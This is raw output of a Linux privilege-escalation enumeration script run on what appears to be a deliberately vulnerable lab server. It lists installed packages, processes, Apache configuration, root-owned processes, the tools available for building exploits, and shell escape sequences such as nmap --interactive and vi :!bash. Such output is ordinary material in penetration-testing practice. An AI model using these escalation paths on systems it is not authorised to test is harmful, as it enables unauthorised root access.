    proftpd 1.3.1-6ubuntu1  virtual-hosting FTP daemon - bina
    psmisc 22.6-1  that use the proc filesystem
    python 2.5.2-0ubuntu1  interactive high-level object-oriented la
    python-apt 0.7.4ubuntu7  interface to libapt-pkg
    python-central 0.6.5ubuntu1  and build utility for Python packag
    python-gdbm 2.5.2-0ubuntu2  dbm database support for Python
    python-gnupginterface 0.3.2-9ubuntu1  interface to GnuPG (GPG)
    python-minimal 2.5.2-0ubuntu1  minimal subset of the Python language (def
    python-support 0.7.5ubuntu1  rebuilding support for python modu
    python2.5 2.5.2-2ubuntu6.1  interactive high-level object-oriented la
    python2.5-dev 2.5.2-2ubuntu6.1  files and a static library for Python
    python2.5-minimal 2.5.2-2ubuntu6.1  minimal subset of the Python language (ver
    quilt 0.46-4  to work with series of patches
    rcs 5.7-21  GNU Revision Control System
    readline-common 5.2-3build1  readline and history libraries, common f
    reiserfsprogs 1:3.6.19-6  tools for ReiserFS filesystems
    rhino 1.6.R7-2ubuntu1  engine written in Java
    rsh-client 0.17-14ubuntu1  clients
    rsh-server 0.17-14ubuntu1  servers
    rsync 2.6.9-6ubuntu2  remote file copy program (like rcp)
    ruby 4.1  interpreter of object-oriented scripting
    ruby1.8 1.8.6.111-2ubuntu1.3  of object-oriented scripting lan
    samba 3.0.20-0.1ubuntu1  LanManager-like file and printer server fo
    samba-common 3.0.20-0.1ubuntu1  common files used by both the server a
    screen 4.0.3-7ubuntu1  multiplexor with VT100/ANSI termina
    sed 4.1.5-5  GNU sed stream editor
    sgml-base 1.26  infrastructure and SGML catalog file su
    snmp 5.4.1~dfsg-4ubuntu4.3  (Simple Network Management Protocol) ap
    snmpd 5.4.1~dfsg-4ubuntu4.3  (Simple Network Management Protocol) ag
    socat 1.6.0.0-1  relay for bidirectional data tr
    ssl-cert 1.0.14-0ubuntu2  debconf wrapper for openssl
    startup-tasks 0.3.9-2  of essential tasks to run on sta
    strace 4.5.15-1.1ubuntu1  system call tracer
    sudo 1.6.9p10-1ubuntu3  limited super user privileges to spe
    sysklogd 1.5-1ubuntu1  Logging Daemon
    system-services 0.3.9-2  of essential system services
    sysv-rc 2.86.ds1-14.1ubuntu45  runlevel change mechanism
    sysvutils 2.86.ds1-14.1ubuntu45  utilities
    tar 1.19-3  version of the tar archiving utility
    tasksel 2.70ubuntu5  for selecting tasks for installation on
    tasksel-data 2.70ubuntu5  tasks used for installation of Debi
    tcpd 7.6.dbs-14  Venema's TCP wrapper utilities
    tcpdump 3.9.8-2  powerful tool for network monitoring and d
    telnet 0.17-35ubuntu1  telnet client
    telnetd 0.17-35ubuntu1  telnet server
    tftpd 0.17-15ubuntu1  file transfer protocol server
    tightvncserver 1.2.9-22  network computing server software
    time 1.7-21build1  GNU time program for measuring cpu resou
    tomcat5.5 5.5.25-5ubuntu1.2  and JSP engine
    tomcat5.5-admin 5.5.25-5ubuntu1.2  Servlet engine -- admin & manager web i
    tomcat5.5-webapps 5.5.25-5ubuntu1.2  Servlet engine -- documentation and exa
    ttf-dejavu 2.23-1  to pull in ttf-dejavu-core and t
    ttf-dejavu-core 2.23-1  font family derivate with additional ch
    ttf-dejavu-extra 2.23-1  font family derivate with additional ch
    tzdata 2008b-1ubuntu1  zone and daylight-saving time data
    ubuntu-keyring 2008.03.04  keys of the Ubuntu archive
    ubuntu-minimal 1.102  core of Ubuntu
    ubuntu-standard 1.102  Ubuntu standard system
    ucf 3.005  Configuration File: preserve user cha
    udev 117-8  device node and kernel event mana
    ufw 0.16.2  for managing a netfilter firewall
    unzip 5.52-10ubuntu2  for .zip files
    update-inetd 4.27-0.6  updater
    update-manager-core 1:0.87.24  release upgrades
    upstart 0.3.9-2  init daemon
    upstart-compat-sysv 0.3.9-2  for System-V-like init
    upstart-logd 0.3.9-2  logging daemon
    usbutils 0.73-5ubuntu2  USB utilities
    util-linux 2.13.1-5ubuntu1  system utilities
    util-linux-locales 2.13.1-5ubuntu1  files for util-linux
    uuid-runtime 1.40.8-2ubuntu2  unique id library
    vim-common 1:7.1-138+1ubuntu3  IMproved - Common files
    vim-tiny 1:7.1-138+1ubuntu3  IMproved - enhanced vi editor - compact v
    w3m 0.5.1-5.1ubuntu1  browsable pager with excellent tables/fr
    wget 1.10.2-3ubuntu1  files from the web
    whiptail 0.52.2-11.2ubuntu1  user-friendly dialog boxes from she
    wireless-tools 29-1ubuntu2  for manipulating Linux Wireless Extens
    wpasupplicant 0.6.0+0.5.8-0ubuntu2  support for WPA and WPA2 (IEEE 802.11
    x11-apps 7.3+1  applications
    x11-common 1:7.3+10ubuntu10.2  Window System (X.Org) infrastructure
    x11-session-utils 7.3+1  session utilities
    x11-utils 7.3+1  utilities
    x11-xfs-utils 7.3+1  font server utilities
    x11-xkb-utils 7.3+1  XKB utilities
    x11-xserver-utils 7.3+2ubuntu0.1  server utilities
    xauth 1:1.0.2-2  authentication utility
    xbase-clients 1:7.3+10ubuntu10.2  X clients - metapackage
    xbitmaps 1.0.1-2ubuntu1  X bitmaps
    xfonts-100dpi 1:1.0.0-4  dpi fonts for X
    xfonts-75dpi 1:1.0.0-4  dpi fonts for X
    xfonts-base 1:1.0.0-5  fonts for X
    xfonts-encodings 1:1.0.2-3  for X.Org fonts
    xfonts-scalable 1:1.0.0-6ubuntu0.8.04.1  fonts for X
    xfonts-utils 1:1.0.1-2ubuntu1  Window System font utility programs
    xinetd 1:2.3.14-5  for inetd with many enhancements
    xinit 1.0.7-2  server initialisation tool
    xkb-data 1.1~cvs.20080104.1-1ubuntu6  Keyboard Extension (XKB) configuration dat
    xorg 1:7.3+10ubuntu10.2  X Window System
    xserver-xorg 1:7.3+10ubuntu10.2  X.Org X server
    xserver-xorg-core 2:1.4.1~git20080131-1ubuntu9.3  X server - core server
    xserver-xorg-input-all 1:7.3+10ubuntu10.2  X.Org X server -- input driver metapacka
    xserver-xorg-input-evdev 1:1.2.0-1ubuntu2  X server -- evdev input driver
    xserver-xorg-input-kbd 1:1.2.2-3ubuntu1  X server -- keyboard input driver
    xserver-xorg-input-mouse 1:1.2.3-2  X server -- mouse input driver
    xserver-xorg-input-synaptics 0.14.7~git20070706-1ubuntu4  TouchPad driver for X.Org server
    xserver-xorg-input-vmmouse 1:12.4.3-1ubuntu1  X server -- VMMouse input driver to us
    xserver-xorg-input-wacom 1:0.7.9.8-0ubuntu3  X server -- Wacom input driver
    xserver-xorg-video-all 1:7.3+10ubuntu10.2  X.Org X server -- output driver metapack
    xserver-xorg-video-apm 1:1.1.1-10  X server -- APM display driver
    xserver-xorg-video-ark 1:0.6.0-9  X server -- ark display driver
    xserver-xorg-video-ati 1:6.8.0-1ubuntu1  X server -- ATI display driver
    xserver-xorg-video-chips 1:1.1.1-9  X server -- Chips display driver
    xserver-xorg-video-cirrus 1:1.1.0-8ubuntu1  X server -- Cirrus display driver
    xserver-xorg-video-cyrix 1:1.1.0-8  X server -- Cyrix display driver
    xserver-xorg-video-dummy 1:0.2.0-7  X server -- dummy display driver
    xserver-xorg-video-fbdev 1:0.3.1-4  X server -- fbdev display driver
    xserver-xorg-video-geode 2.9.0-1ubuntu2.5  server -- Geode GX2/LX display driver
    xserver-xorg-video-glint 1:1.1.1-8  X server -- Glint display driver
    xserver-xorg-video-i128 1:1.2.1-4  X server -- i128 display driver
    xserver-xorg-video-i740 1:1.1.0-7  X server -- i740 display driver
    xserver-xorg-video-i810 2:1.7.4-0ubuntu7  X server -- Intel i8xx, i9xx display d
    xserver-xorg-video-imstt 1:1.1.0-7  X server -- IMSTT display driver
    xserver-xorg-video-intel 2:2.2.1-1ubuntu13.8  X server -- Intel i8xx, i9xx display d
    xserver-xorg-video-mga 1:1.4.8.dfsg.1-1  X server -- MGA display driver
    xserver-xorg-video-neomagic 1:1.1.1-8  X server -- Neomagic display driver
    xserver-xorg-video-newport 1:0.2.1-4ubuntu1  X server -- Newport display driver
    xserver-xorg-video-nsc 1:2.8.3-2ubuntu0.1  X server -- NSC Geode GX1 display driv
    xserver-xorg-video-nv 1:2.1.8-1ubuntu1  X server -- NV display driver
    xserver-xorg-video-openchrome 1:0.2.901-0ubuntu4  X server -- VIA display driver
    xserver-xorg-video-psb 0.2.1-1ubuntu3  graphics driver for Poulsbo
    xserver-xorg-video-rendition 1:4.1.3.dfsg.1-4  X server -- Rendition display driver
    xserver-xorg-video-s3 1:0.5.0-4  X server -- legacy S3 display driver
    xserver-xorg-video-s3virge 1:1.9.1-7  X server -- S3 ViRGE display driver
    xserver-xorg-video-savage 1:2.1.3-5  X server -- Savage display driver
    xserver-xorg-video-siliconmotion 1:1.5.1-3  X server -- SiliconMotion display driv
    xserver-xorg-video-sis 1:0.9.3-6  X server -- SiS display driver
    xserver-xorg-video-sisusb 1:0.8.1-9  X server -- SiS USB display driver
    xserver-xorg-video-tdfx 1:1.3.0-6  X server -- tdfx display driver
    xserver-xorg-video-tga 1:1.1.0-9ubuntu1  X server -- TGA display driver
    xserver-xorg-video-trident 1:1.2.4-1  X server -- Trident display driver
    xserver-xorg-video-tseng 1:1.1.1-4  X server -- Tseng display driver
    xserver-xorg-video-v4l 1:0.1.1-6ubuntu1  X server -- Video 4 Linux display driv
    xserver-xorg-video-vesa 1:1.3.0-4ubuntu4  X server -- VESA display driver
    xserver-xorg-video-vga 1:4.1.0-8  X server -- VGA display driver
    xserver-xorg-video-via 1:0.2.2-5  X server -- VIA display driver
    xserver-xorg-video-vmware 1:10.15.2-1ubuntu2  X server -- VMware display driver
    xserver-xorg-video-voodoo 1:1.1.1-5  X server -- Voodoo display driver
    xterm 229-1ubuntu1.1  terminal emulator
    zlib1g 1:1.2.3.3.dfsg-7ubuntu1  library - runtime
    zlib1g-dev 1:1.2.3.3.dfsg-7ubuntu1  library - development
[+] Current processes
    USER PID START TIME COMMAND
    root 1 Sep10 0:01 /sbin/init
    root 2 Sep10 0:00 [kthreadd]
    root 3 Sep10 0:00 [migration/0]
    root 4 Sep10 0:00 [ksoftirqd/0]
    root 5 Sep10 0:00 [watchdog/0]
    root 6 Sep10 0:00 [events/0]
    root 7 Sep10 0:00 [khelper]
    root 41 Sep10 0:00 [kblockd/0]
    root 64 Sep10 0:00 [kseriod]
    root 182 Sep10 0:00 [pdflush]
    root 183 Sep10 0:00 [pdflush]
    root 184 Sep10 0:00 [kswapd0]
    root 225 Sep10 0:00 [aio/0]
    root 1245 Sep10 0:00 [ksnapd]
    root 1436 Sep10 0:00 [ata/0]
    root 1439 Sep10 0:00 [ata_aux]
    root 1446 Sep10 0:00 [scsi_eh_0]
    root 1452 Sep10 0:00 [scsi_eh_1]
    root 1463 Sep10 0:00 [ksuspend_usbd]
    root 1468 Sep10 0:00 [khubd]
    root 2331 Sep10 0:00 [scsi_eh_2]
    root 2508 Sep10 0:01 [kjournald]
    root 2683 Sep10 0:00 /sbin/udevd
    root 3046 Sep10 0:00 [kpsmoused]
    root 3992 Sep10 0:00 [kjournald]
    daemon 4211 Sep10 0:00 /sbin/portmap
    statd 4229 Sep10 0:00 /sbin/rpc.statd
    root 4235 Sep10 0:00 [rpciod/0]
    root 4250 Sep10 0:00 /usr/sbin/rpc.idmapd
    root 4477 Sep10 0:00 /sbin/getty
    root 4478 Sep10 0:00 /sbin/getty
    root 4484 Sep10 0:00 /sbin/getty
    root 4487 Sep10 0:00 /sbin/getty
    root 4490 Sep10 0:00 /sbin/getty
    syslog 4528 Sep10 0:00 /sbin/syslogd
    root 4579 Sep10 0:00 /bin/dd
    klog 4581 Sep10 0:00 /sbin/klogd
    bind 4606 Sep10 0:00 /usr/sbin/named
    root 4630 Sep10 0:00 /usr/sbin/sshd
    root 4711 Sep10 0:00 /bin/sh
    mysql 4753 Sep10 0:04 /usr/sbin/mysqld
    root 4755 Sep10 0:00 logger
    postgres 4834 Sep10 0:00 /usr/lib/postgresql/8.3/bin/postgres
    postgres 4837 Sep10 0:02 postgres:
    postgres 4838 Sep10 0:02 postgres:
    postgres 4839 Sep10 0:00 postgres:
    postgres 4840 Sep10 0:00 postgres:
    daemon 4861 Sep10 0:00 distccd
    daemon 4862 Sep10 0:00 distccd
    root 4916 Sep10 0:00 [lockd]
    root 4917 Sep10 0:00 [nfsd4]
    root 4918 Sep10 0:00 [nfsd]
    root 4919 Sep10 0:00 [nfsd]
    root 4920 Sep10 0:00 [nfsd]
    root 4921 Sep10 0:00 [nfsd]
    root 4922 Sep10 0:00 [nfsd]
    root 4923 Sep10 0:00 [nfsd]
    root 4924 Sep10 0:00 [nfsd]
    root 4925 Sep10 0:00 [nfsd]
    root 4929 Sep10 0:00 /usr/sbin/rpc.mountd
    root 4997 Sep10 0:00 /usr/lib/postfix/master
    postfix 5000 Sep10 0:00 qmgr
    root 5005 Sep10 0:00 /usr/sbin/nmbd
    root 5007 Sep10 0:00 /usr/sbin/smbd
    root 5011 Sep10 0:00 /usr/sbin/smbd
    snmp 5013 Sep10 0:04 /usr/sbin/snmpd
    root 5028 Sep10 0:00 /usr/sbin/xinetd
    daemon 5073 Sep10 0:00 distccd
    daemon 5074 Sep10 0:00 distccd
    proftpd 5076 Sep10 0:00 proftpd:
    daemon 5092 Sep10 0:00 /usr/sbin/atd
    root 5105 Sep10 0:00 /usr/sbin/cron
    root 5135 Sep10 0:00 /usr/bin/jsvc
    root 5136 Sep10 0:00 /usr/bin/jsvc
    tomcat55 5138 Sep10 1:24 /usr/bin/jsvc
    root 5158 Sep10 0:00 /usr/sbin/apache2
    root 5179 Sep10 0:00 /usr/bin/rmiregistry
    root 5183 Sep10 0:31 ruby
    root 5188 Sep10 0:01 /usr/bin/unrealircd
    root 5197 Sep10 0:00 /sbin/getty
    root 5202 Sep10 0:06 Xtightvnc
    root 5206 Sep10 0:00 /bin/sh
    root 5209 Sep10 0:00 xterm
    root 5212 Sep10 0:08 fluxbox
    root 5223 Sep10 0:00 -bash
    www-data 8663 06:54 0:00 /usr/sbin/apache2
    www-data 8665 06:54 0:00 /usr/sbin/apache2
    www-data 8668 06:54 0:00 /usr/sbin/apache2
    www-data 8671 06:54 0:00 /usr/sbin/apache2
    www-data 8672 06:54 0:00 /usr/sbin/apache2
    postfix 9368 07:18 0:00 pickup
    nobody 9622 07:45 0:01 /usr/sbin/smbd
    root 9847 08:14 0:00 sleep
    root 9848 08:14 0:00 telnet
    root 9849 08:14 0:00 sh
    root 9850 08:14 0:00 sh
    root 9851 08:14 0:00 telnet
    daemon 9899 08:23 0:00 sleep
    daemon 9900 08:23 0:00 telnet
    daemon 9901 08:23 0:00 sh
    daemon 9902 08:23 0:00 sh
    daemon 9903 08:23 0:00 telnet
    daemon 9930 08:26 0:00 python
    daemon 9931 08:26 0:00 /bin/bash
    daemon 9961 08:34 0:00 python
    daemon 10162 08:34 0:00 /bin/sh
    daemon 10163 08:34 0:00 ps
[+] Apache Version and Modules
    Server version: Apache/2.2.8 (Ubuntu)
    Server built:   Mar  9 2010 20:45:36
[+] Apache Config File
    #
    # Based upon the NCSA server configuration files originally by Rob McCool.
    #
    # This is the main Apache server configuration file.  It contains the
    # configuration directives that give the server its instructions.
    # See https://httpd.apache.org/docs/2.2/ for detailed information about
    # the directives.
    #
    # Do NOT simply read the instructions in here without understanding
    # what they do.  They're here only as hints or reminders.  If you are unsure
    # consult the online docs. You have been warned.
    #
    # The configuration directives are grouped into three basic sections:
    #  1. Directives that control the operation of the Apache server process as a
    #     whole (the 'global environment').
    #  2. Directives that define the parameters of the 'main' or 'default' server,
    #     which responds to requests that aren't handled by a virtual host.
    #     These directives also provide default values for the settings
    #     of all virtual hosts.
    #  3. Settings for virtual hosts, which allow Web requests to be sent to
    #     different IP addresses or hostnames and have them handled by the
    #     same Apache server process.
    #
    # Configuration and logfile names: If the filenames you specify for many
    # of the server's control files begin with "/" (or "drive:/" for Win32), the
    # server will use that explicit path.  If the filenames do *not* begin
    # with "/", the value of ServerRoot is prepended -- so "/var/log/apache2/foo.log"
    # with ServerRoot set to "" will be interpreted by the
    # server as "//var/log/apache2/foo.log".
    #
    ### Section 1: Global Environment
    #
    # The directives in this section affect the overall operation of Apache,
    # such as the number of concurrent requests it can handle or where it
    # can find its configuration files.
    #
    #
    # ServerRoot: The top of the directory tree under which the server's
    # configuration, error, and log files are kept.
    #
    # NOTE!  If you intend to place this on an NFS (or otherwise network)
    # mounted filesystem then please read the LockFile documentation (available
    # at <URL:https://httpd.apache.org/docs-2.1/mod/mpm_common.html#lockfile>);
    # you will save yourself a lot of trouble.
    #
    # Do NOT add a slash at the end of the directory path.
    #
    ServerRoot "/etc/apache2"
    #
    # The accept serialization lock file MUST BE STORED ON A LOCAL DISK.
    #
    #<IfModule !mpm_winnt.c>
    #<IfModule !mpm_netware.c>
    LockFile /var/lock/apache2/accept.lock
    #</IfModule>
    #</IfModule>
    #
    # PidFile: The file in which the server should record its process
    # identification number when it starts.
    # This needs to be set in /etc/apache2/envvars
    #
    PidFile ${APACHE_PID_FILE}
    #
    # Timeout: The number of seconds before receives and sends time out.
    #
    Timeout 300
    #
    # KeepAlive: Whether or not to allow persistent connections (more than
    # one request per connection). Set to "Off" to deactivate.
    #
    KeepAlive On
    #
    # MaxKeepAliveRequests: The maximum number of requests to allow
    # during a persistent connection. Set to 0 to allow an unlimited amount.
    # We recommend you leave this number high, for maximum performance.
    #
    MaxKeepAliveRequests 100
    #
    # KeepAliveTimeout: Number of seconds to wait for the next request from the
    # same client on the same connection.
    #
    KeepAliveTimeout 15
    ##
    ## Server-Pool Size Regulation (MPM specific)
    ##
    # prefork MPM
    # StartServers: number of server processes to start
    # MinSpareServers: minimum number of server processes which are kept spare
    # MaxSpareServers: maximum number of server processes which are kept spare
    # MaxClients: maximum number of server processes allowed to start
    # MaxRequestsPerChild: maximum number of requests a server process serves
    <IfModule mpm_prefork_module>
    StartServers          5
    MinSpareServers       5
    MaxSpareServers      10
    MaxClients          150
    MaxRequestsPerChild   0
    </IfModule>
    # worker MPM
    # StartServers: initial number of server processes to start
    # MaxClients: maximum number of simultaneous client connections
    # MinSpareThreads: minimum number of worker threads which are kept spare
    # MaxSpareThreads: maximum number of worker threads which are kept spare
    # ThreadsPerChild: constant number of worker threads in each server process
    # MaxRequestsPerChild: maximum number of requests a server process serves
    <IfModule mpm_worker_module>
    StartServers          2
    MaxClients          150
    MinSpareThreads      25
    MaxSpareThreads      75
    ThreadsPerChild      25
    MaxRequestsPerChild   0
    </IfModule>
    # These need to be set in /etc/apache2/envvars
    User ${APACHE_RUN_USER}
    Group ${APACHE_RUN_GROUP}
    #
    # AccessFileName: The name of the file to look for in each directory
    # for additional configuration directives.  See also the AllowOverride
    # directive.
    #
    AccessFileName .htaccess
    #
    # The following lines prevent .htaccess and .htpasswd files from being
    # viewed by Web clients.
    #
    <Files ~ "^\.ht">
    Order allow,deny
    Deny from all
    </Files>
    #
    # DefaultType is the default MIME type the server will use for a document
    # if it cannot otherwise determine one, such as from filename extensions.
    # If your server contains mostly text or HTML documents, "text/plain" is
    # a good value.  If most of your content is binary, such as applications
    # or images, you may want to use "application/octet-stream" instead to
    # keep browsers from trying to display binary files as though they are
    # text.
    #
    DefaultType text/plain
    #
    # HostnameLookups: Log the names of clients or just their IP addresses
    # e.g., www.apache.org (on) or 204.62.129.132 (off).
    # The default is off because it'd be overall better for the net if people
    # had to knowingly turn this feature on, since enabling it means that
    # each client request will result in AT LEAST one lookup request to the
    # nameserver.
    #
    HostnameLookups Off
    # ErrorLog: The location of the error log file.
    # If you do not specify an ErrorLog directive within a <VirtualHost>
    # container, error messages relating to that virtual host will be
    # logged here.  If you *do* define an error logfile for a <VirtualHost>
    # container, that host's errors will be logged there and not here.
    #
    ErrorLog /var/log/apache2/error.log
    #
    # LogLevel: Control the number of messages logged to the error_log.
    # Possible values include: debug, info, notice, warn, error, crit,
    # alert, emerg.
    #
    LogLevel warn
    # Include module configuration:
    Include /etc/apache2/mods-enabled/*.load
    Include /etc/apache2/mods-enabled/*.conf
    # Include all the user configurations:
    Include /etc/apache2/httpd.conf
    # Include ports listing
    Include /etc/apache2/ports.conf
    #
    # The following directives define some format nicknames for use with
    # a CustomLog directive (see below).
    # If you are behind a reverse proxy, you might want to change %h into %{X-Forwarded-For}i
    #
    LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\"" combined
    LogFormat "%h %l %u %t \"%r\" %>s %b" common
    LogFormat "%{Referer}i -> %U" referer
    LogFormat "%{User-agent}i" agent
    #
    # ServerTokens
    # This directive configures what you return as the Server HTTP response
    # Header. The default is 'Full' which sends information about the OS-Type
    # and compiled in modules.
    # Set to one of:  Full | OS | Minor | Minimal | Major | Prod
    # where Full conveys the most information, and Prod the least.
    #
    ServerTokens Full
    #
    # Optionally add a line containing the server version and virtual host
    # name to server-generated pages (internal error documents, FTP directory
    # listings, mod_status and mod_info output etc., but not CGI generated
    # documents or custom error documents).
    # Set to "EMail" to also include a mailto: link to the ServerAdmin.
    # Set to one of:  On | Off | EMail
    #
    ServerSignature On
    #
    # Customizable error responses come in three flavors:
    # 1) plain text 2) local redirects 3) external redirects
    #
    # Some examples:
    #ErrorDocument 500 "The server made a boo boo."
    #ErrorDocument 404 /missing.html
    #ErrorDocument 404 "/cgi-bin/missing_handler.pl"
    #ErrorDocument 402 https://www.example.com/subscription_info.html
    #
    #
    # Putting this all together, we can internationalize error responses.
    #
    # We use Alias to redirect any /error/HTTP_<error>.html.var response to
    # our collection of by-error message multi-language collections.  We use
    # includes to substitute the appropriate text.
    #
    # You can modify the messages' appearance without changing any of the
    # default HTTP_<error>.html.var files by adding the line:
    #
    #   Alias /error/include/ "/your/include/path/"
    #
    # which allows you to create your own set of files by starting with the
    # /usr/share/apache2/error/include/ files and copying them to /your/include/path/,
    # even on a per-VirtualHost basis.  The default include files will display
    # your Apache version number and your ServerAdmin email address regardless
    # of the setting of ServerSignature.
    #
    # The internationalized error documents require mod_alias, mod_include
    # and mod_negotiation.  To activate them, uncomment the following 30 lines.
    #    Alias /error/ "/usr/share/apache2/error/"
    #
    #    <Directory "/usr/share/apache2/error">
    #        AllowOverride None
    #        Options IncludesNoExec
    #        AddOutputFilter Includes html
    #        AddHandler type-map var
    #        Order allow,deny
    #        Allow from all
    #        LanguagePriority en cs de es fr it nl sv pt-br ro
    #        ForceLanguagePriority Prefer Fallback
    #    </Directory>
    #
    #    ErrorDocument 400 /error/HTTP_BAD_REQUEST.html.var
    #    ErrorDocument 401 /error/HTTP_UNAUTHORIZED.html.var
    #    ErrorDocument 403 /error/HTTP_FORBIDDEN.html.var
    #    ErrorDocument 404 /error/HTTP_NOT_FOUND.html.var
    #    ErrorDocument 405 /error/HTTP_METHOD_NOT_ALLOWED.html.var
    #    ErrorDocument 408 /error/HTTP_REQUEST_TIME_OUT.html.var
    #    ErrorDocument 410 /error/HTTP_GONE.html.var
    #    ErrorDocument 411 /error/HTTP_LENGTH_REQUIRED.html.var
    #    ErrorDocument 412 /error/HTTP_PRECONDITION_FAILED.html.var
    #    ErrorDocument 413 /error/HTTP_REQUEST_ENTITY_TOO_LARGE.html.var
    #    ErrorDocument 414 /error/HTTP_REQUEST_URI_TOO_LARGE.html.var
    #    ErrorDocument 415 /error/HTTP_UNSUPPORTED_MEDIA_TYPE.html.var
    #    ErrorDocument 500 /error/HTTP_INTERNAL_SERVER_ERROR.html.var
    #    ErrorDocument 501 /error/HTTP_NOT_IMPLEMENTED.html.var
    #    ErrorDocument 502 /error/HTTP_BAD_GATEWAY.html.var
    #    ErrorDocument 503 /error/HTTP_SERVICE_UNAVAILABLE.html.var
    #    ErrorDocument 506 /error/HTTP_VARIANT_ALSO_VARIES.html.var
    # Include of directories ignores editors' and dpkg's backup files,
    # see README.Debian for details.
    # Include generic snippets of statements
    Include /etc/apache2/conf.d/
    # Include the virtual host configurations:
    Include /etc/apache2/sites-enabled/
[+] Sudo Version (Check out https://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=sudo)
    Sudo version 1.6.9p10
[*] IDENTIFYING PROCESSES AND PACKAGES RUNNING AS ROOT OR OTHER SUPERUSER...
    root 5212 Sep10 0:08 fluxbox
        Possible Related Packages: 
             fluxbox 1.1.1-1~hardy1  configurable and low resource X11 Win
    root 4579 Sep10 0:00 /bin/dd
    root 1468 Sep10 0:00 [khubd]
    root 5179 Sep10 0:00 /usr/bin/rmiregistry
    root 4922 Sep10 0:00 [nfsd]
    root 3046 Sep10 0:00 [kpsmoused]
    root 4919 Sep10 0:00 [nfsd]
    root 4929 Sep10 0:00 /usr/sbin/rpc.mountd
    root 183 Sep10 0:00 [pdflush]
    root 5223 Sep10 0:00 -bash
    root 5007 Sep10 0:00 /usr/sbin/smbd
    root 5011 Sep10 0:00 /usr/sbin/smbd
    root 4918 Sep10 0:00 [nfsd]
    root 41 Sep10 0:00 [kblockd/0]
    root 4997 Sep10 0:00 /usr/lib/postfix/master
        Possible Related Packages: 
             base-passwd 3.5.16  base system master password and group
    root 1446 Sep10 0:00 [scsi_eh_0]
    root 5206 Sep10 0:00 /bin/sh
    root 9849 08:14 0:00 sh
    root 4916 Sep10 0:00 [lockd]
    root 2508 Sep10 0:01 [kjournald]
    root 5158 Sep10 0:00 /usr/sbin/apache2
        Possible Related Packages: 
             apache2 2.2.8-1  generation, scalable, extendable web se
             apache2-mpm-prefork 2.2.8-1ubuntu0.15  model for Apache HTTPD
             apache2-utils 2.2.8-1ubuntu0.15  programs for webservers
             apache2.2-common 2.2.8-1ubuntu0.15  generation, scalable, extendable web se
             libapache2-mod-php5 5.2.4-2ubuntu5.24  HTML-embedded scripting languag
    root 4711 Sep10 0:00 /bin/sh
    root 6 Sep10 0:00 [events/0]
    root 4490 Sep10 0:00 /sbin/getty
    root 1436 Sep10 0:00 [ata/0]
    root 9848 08:14 0:00 telnet
        Possible Related Packages: 
             telnet 0.17-35ubuntu1  telnet client
             telnetd 0.17-35ubuntu1  telnet server
    root 3 Sep10 0:00 [migration/0]
    root 2331 Sep10 0:00 [scsi_eh_2]
    root 4 Sep10 0:00 [ksoftirqd/0]
    root 4630 Sep10 0:00 /usr/sbin/sshd
    root 5135 Sep10 0:00 /usr/bin/jsvc
        Possible Related Packages: 
             jsvc 1.0.2~svn20061127-6  to launch Java applications as daemo
    root 4235 Sep10 0:00 [rpciod/0]
    root 64 Sep10 0:00 [kseriod]
    root 7 Sep10 0:00 [khelper]
    root 4478 Sep10 0:00 /sbin/getty
    root 5005 Sep10 0:00 /usr/sbin/nmbd
    root 5202 Sep10 0:06 Xtightvnc
    root 5188 Sep10 0:01 /usr/bin/unrealircd
    root 9851 08:14 0:00 telnet
        Possible Related Packages: 
             telnet 0.17-35ubuntu1  telnet client
             telnetd 0.17-35ubuntu1  telnet server
    root 5 Sep10 0:00 [watchdog/0]
    root 4755 Sep10 0:00 logger
    root 4917 Sep10 0:00 [nfsd4]
    root 4477 Sep10 0:00 /sbin/getty
    root 1463 Sep10 0:00 [ksuspend_usbd]
    root 5105 Sep10 0:00 /usr/sbin/cron
        Possible Related Packages: 
             cron 3.0pl1-100ubuntu2  of regular background processing
    root 9847 08:14 0:00 sleep
    root 5136 Sep10 0:00 /usr/bin/jsvc
        Possible Related Packages: 
             jsvc 1.0.2~svn20061127-6  to launch Java applications as daemo
    root 3992 Sep10 0:00 [kjournald]
    root 4924 Sep10 0:00 [nfsd]
    root 4250 Sep10 0:00 /usr/sbin/rpc.idmapd
    root 4484 Sep10 0:00 /sbin/getty
    root 4487 Sep10 0:00 /sbin/getty
    root 2683 Sep10 0:00 /sbin/udevd
    root 2 Sep10 0:00 [kthreadd]
    root 4920 Sep10 0:00 [nfsd]
    root 5209 Sep10 0:00 xterm
        Possible Related Packages: 
             xterm 229-1ubuntu1.1  terminal emulator
    root 4923 Sep10 0:00 [nfsd]
    root 1439 Sep10 0:00 [ata_aux]
    root 5028 Sep10 0:00 /usr/sbin/xinetd
        Possible Related Packages: 
             xinetd 1:2.3.14-5  for inetd with many enhancements
    root 1452 Sep10 0:00 [scsi_eh_1]
    root 225 Sep10 0:00 [aio/0]
    root 4925 Sep10 0:00 [nfsd]
    root 5197 Sep10 0:00 /sbin/getty
    root 182 Sep10 0:00 [pdflush]
    root 5183 Sep10 0:31 ruby
        Possible Related Packages: 
             libruby1.8 1.8.6.111-2ubuntu1.3  necessary to run Ruby 1.8
             ruby 4.1  interpreter of object-oriented scripting
             ruby1.8 1.8.6.111-2ubuntu1.3  of object-oriented scripting lan
    root 184 Sep10 0:00 [kswapd0]
    root 4921 Sep10 0:00 [nfsd]
    root 1245 Sep10 0:00 [ksnapd]
    root 9850 08:14 0:00 sh
    root 1 Sep10 0:01 /sbin/init
        Possible Related Packages: 
             busybox-initramfs 1:1.1.3-5ubuntu12  shell setup for initramfs
             initramfs-tools 0.85eubuntu36  for generating an initramfs
             initscripts 2.86.ds1-14.1ubuntu45  for initializing and shutting down t
             libklibc 1.5.7-4ubuntu3  libc subset for use with initramfs
             lsb-base 3.2-4ubuntu1  Standard Base 3.2 init script function
             module-init-tools 3.3-pre11-4ubuntu5  for managing Linux kernel modules
             upstart 0.3.9-2  init daemon
             upstart-compat-sysv 0.3.9-2  for System-V-like init
             xinit 1.0.7-2  server initialisation tool
[*] ENUMERATING INSTALLED LANGUAGES/TOOLS FOR SPLOIT BUILDING...
[+] Installed Tools
    /usr/bin/awk
    /usr/bin/perl
    /usr/bin/python
    /usr/bin/ruby
    /usr/bin/gcc
    /usr/bin/cc
    /usr/bin/vi
    /usr/bin/vim
    /usr/bin/nmap
    /usr/bin/find
    /bin/netcat
    /bin/nc
    /usr/bin/wget
    /usr/bin/ftp
[+] Related Shell Escape Sequences...
    nmap-->	--interactive
    vi-->	:!bash
    vi-->	:set shell=/bin/bash:shell
    vi-->	:!bash
    vi-->	:set shell=/bin/bash:shell
